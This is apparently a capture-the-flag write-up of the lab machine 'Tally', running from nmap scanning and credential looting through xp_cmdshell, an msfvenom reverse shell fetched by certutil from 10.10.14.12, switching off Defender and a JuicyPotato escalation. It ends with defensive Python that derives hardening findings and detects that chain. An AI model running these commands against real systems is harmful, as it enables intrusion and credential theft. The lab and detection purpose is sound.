nmap -p- -v --min-rate=10000 10.10.10.59
nmap -p 21,80,81,135,139,445,808,1433,5985,32843,32846,47001,49664,49668,49670 -sV -A -v 10.10.10.59
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 50996DA127314E31E0B14D57B9847C9F
|_http-generator: Microsoft SharePoint
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open ccproxy-http?
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-06-21T11:23:13
| Not valid after: 2052-06-21T11:23:13
| MD5: 4f74 0b7f 7b50 1a25 7d7c 0ddc 8a54 a8cd
|_SHA-1: d780 804b c9ca 1c97 8829 7e90 fdbd 6145 c571 caf7
|_ssl-date: 2022-06-21T11:55:13+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
32843/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32846/tcp open msexchange-logcopier Microsoft Exchange 2010 log copier
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open unknown
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 10.10.10.59:1433:
| Version:
| name: Microsoft SQL Server 2016 RTM
| number: 13.00.1601.00
| Product: Microsoft SQL Server 2016
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-06-21T11:54:51
|_ start_date: 2022-06-21T11:22:57
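The scan above already states the weak spots (no SMB signing requirement, an RTM SQL Server build, a self-signed SHA-1 fallback certificate, cleartext FTP). As an added example that is not part of the original writeup, the Python below parses nmap's -sV text format and turns those lines into hardening findings; the report excerpt is trimmed from the scan output on this page and the rule wording is my own.

```python
"""Turn an nmap -sV/-A text report into hardening findings (added example)."""
import re

# Trimmed excerpt of the Tally scan output shown on this page
NMAP_REPORT = """\
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 10.0
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Signature Algorithm: sha1WithRSAEncryption
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
| ms-sql-info:
| Post-SP patches applied: false
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_ Message signing enabled but not required
"""

# "<port>/<proto> <state> <service> <version text>" as nmap prints it
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


def parse_ports(report):
    """Map port number -> {proto, state, service, version} for each port line."""
    ports = {}
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports[int(m.group(1))] = {"proto": m.group(2), "state": m.group(3),
                                      "service": m.group(4), "version": m.group(5).strip()}
    return ports


def audit(report):
    """Return a list of hardening findings derived from the report text."""
    ports = parse_ports(report)
    findings = []
    if 21 in ports:
        findings.append("ftp: credentials cross the network in cleartext; prefer SFTP/FTPS")
    if 445 in ports and ("message_signing: disabled" in report or "not required" in report):
        findings.append("smb: signing not required; require signing via policy")
    if 1433 in ports:
        findings.append("mssql: reachable from the network; restrict to application hosts and keep xp_cmdshell disabled")
        if "Post-SP patches applied: false" in report:
            findings.append("mssql: RTM build with no patches applied; update the instance")
    if "sha1WithRSAEncryption" in report and "Self_Signed" in report:
        findings.append("tls: self-signed SHA-1 fallback certificate; deploy a CA-issued certificate")
    if 5985 in ports:
        findings.append("winrm: management port exposed; limit to the admin network")
    return findings
```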
A quick try of RPC, SMB and FTP: none of them allow anonymous login.
Wappalyzer fingerprints the site as Microsoft SharePoint 15.0.0.4420, IIS 10.0 and Microsoft ASP.NET 4.0.30319. Visiting the SharePoint site shows it expects a hostname; after adding tally to the hosts file the page does change somewhat. For directory scanning, dirsearch does not work well here because it cannot recognise the error pages, so I switched to dirb. SecLists has a SharePoint wordlist:
dirb http://tally ~/Documents/SecLists-2021.3.1/Discovery/Web-Content/CMS/Sharepoint.fuzz.txt -w
Going through the results one by one, many return 200 but actually require a login. Two useful files turned up. The first, "ftp detail", when downloaded contains:
FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in
Site Pages contains a notice.
Combining the two documents, I logged into FTP successfully with the credentials ftp_user:UTDRSCH53c"$6hys, then started digging for sensitive files. The User directory has the following users, which may be useful: Administrator Ekta Jess Paul Rahul Sarah Stuart Tim Yenwi. Under Sarah there is a notes.txt: done install Sharepoint, replace Orchard CMS to do uninstall SQL Server 2016
In Tim's folder there is KeePass along with his .kdbx file; download it, switching FTP to binary mode before the transfer.
Googled "kali how to read kdbx file": how-to-use-kpcli-to-manage-keepass2-password-files-on-an-ubuntu-14-04-server, how-to-crack-a-keepass-database-file. Try cracking it with John:
keepass2john tim.kdbx > Keepasshash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt Keepasshash.txt
Got Tim's password: simplementeyo
kpcli --kdb=./tim.kdbx
find .
Obtained two sets of credentials:
cisco cisco123
Finance Acc0unting
Try logging into RPC and SMB:
smbclient -U Finance%"Acc0unting" -L //10.10.10.59
Use smbmap to list the files recursively, which is easier to review:
smbmap -H 10.10.10.59 -u Finance -p Acc0unting -R ACCT
Found a sensitive file, conn-info.txt. Connect with smbclient and get it, or download it with smbmap. Contents:
old server details
db: sa
pass: YE%TJC%&HYbe5Nw
have changed for tally
Tried logging into SQL Server with these and, as expected, it failed. Found a tester.exe; strings reveals the account and password used to connect to the database. 🚩 I only found this file after reading a writeup; in a real exam with this many files, apart from ruling out the business-related ones, going through them one by one is probably the only option.
impacket-mssqlclient sa:'GWE3V65#6KFH93@4GWTG2G'@10.10.10.59
(Specifying a database actually prevents the connection.) Through xp_cmdshell we get execution as sarah.
Found the user flag on Sarah's desktop. The other two documents give some information:
xp_cmdshell type c:\users\Sarah\desktop\"note to tim (draft).txt"
xp_cmdshell type c:\users\Sarah\desktop\todo.txt
Hi Tim,
As discussed in the cybersec meeting, malware is often hidden in trusted executables in order to evade detection. I read somewhere that cmd.exe is a common target for backdooring, so I've gone ahead and disallowed any cmd.exe outside the Windows folder from executing.
Thanks,
Sarah
In todo.txt, Sarah reveals she has confirmed Windows Defender is enabled.
First generate a payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.12 LPORT=4444 EXITFUNC=thread -f c -o tally.c
Then use 遮天v2 for AV evasion and upload the generated exe to the target:
xp_cmdshell "cd c:\temp && certutil -urlcache -split -f http://10.10.14.12:8000/FdASC.exe"
xp_cmdshell c:\temp\FdASC.exe
Then turn off Defender real-time monitoring:
powershell -c 'Set-MpPreference -DisableRealtimeMonitoring $true'
whoami /priv
SeImpersonatePrivilege is present, so go straight for JuicyPotato (烂土豆).
Use certutil again to download juicypotato.exe and an AV-evaded reverse shell exe (this one calls back to port 1234; evasion as above) onto the target.
.\jp.exe -t t -p c:\windows\system32\cmd.exe -l 2234 -a "/c c:\temp\syst.exe"
Got SYSTEM and read the flag.
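Every step of the post-exploitation chain above leaves a process-creation trail: sqlservr.exe spawning cmd.exe (xp_cmdshell), certutil used as a downloader, Set-MpPreference disabling real-time monitoring, and, per Sarah's note, cmd.exe executing outside the Windows folder. As an added example from the defender's side (not part of the original writeup), the Python below runs those four detections over constructed events written in a simplified key=value form modelled on the parent/new-process/command-line fields of Windows Security event 4688; the event format and sample lines are my own.

```python
"""Detect the post-exploitation chain from this writeup in process telemetry."""
import re

# Constructed sample events (simplified 4688-style fields, not real logs)
EVENTS = [
    r"parent=C:\Program Files\Microsoft SQL Server\MSSQL13.MSSQLSERVER\MSSQL\Binn\sqlservr.exe new=C:\Windows\System32\cmd.exe cmd=cmd.exe /c type c:\users\Sarah\desktop\todo.txt",
    r"parent=C:\Windows\System32\cmd.exe new=C:\Windows\System32\certutil.exe cmd=certutil -urlcache -split -f http://10.10.14.12:8000/FdASC.exe",
    r"parent=C:\Windows\System32\cmd.exe new=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell -c Set-MpPreference -DisableRealtimeMonitoring $true",
    r"parent=C:\Windows\explorer.exe new=C:\Windows\System32\notepad.exe cmd=notepad.exe todo.txt",
    r"parent=C:\Windows\explorer.exe new=C:\Users\Public\cmd.exe cmd=cmd.exe /c c:\temp\syst.exe",
]

EVENT_RE = re.compile(r"^parent=(?P<parent>.*?) new=(?P<new>.*?) cmd=(?P<cmd>.*)$")


def parse_event(line):
    """Split one constructed event line into its parent, new and cmd fields."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def basename(path):
    """Last path component, lower-cased, for case-insensitive image matching."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(event):
    """Return the detection names that fire for a single parsed event."""
    parent, new, cmd = basename(event["parent"]), basename(event["new"]), event["cmd"].lower()
    alerts = []
    if parent == "sqlservr.exe" and new in ("cmd.exe", "powershell.exe"):
        alerts.append("sql-server-spawned-shell")      # xp_cmdshell in use
    if new == "certutil.exe" and "-urlcache" in cmd and "http" in cmd:
        alerts.append("certutil-download")             # LOLBin used to fetch a file
    if "set-mppreference" in cmd and "disablerealtimemonitoring" in cmd:
        alerts.append("defender-tamper")               # real-time protection switched off
    if new == "cmd.exe" and not event["new"].lower().startswith("c:\\windows\\"):
        alerts.append("cmd-outside-windows")           # the rule Sarah describes in her note
    return alerts


def scan(lines):
    """Map detection name -> list of offending command lines across all events."""
    hits = {}
    for line in lines:
        ev = parse_event(line)
        if ev:
            for name in detect(ev):
                hits.setdefault(name, []).append(ev["cmd"])
    return hits
```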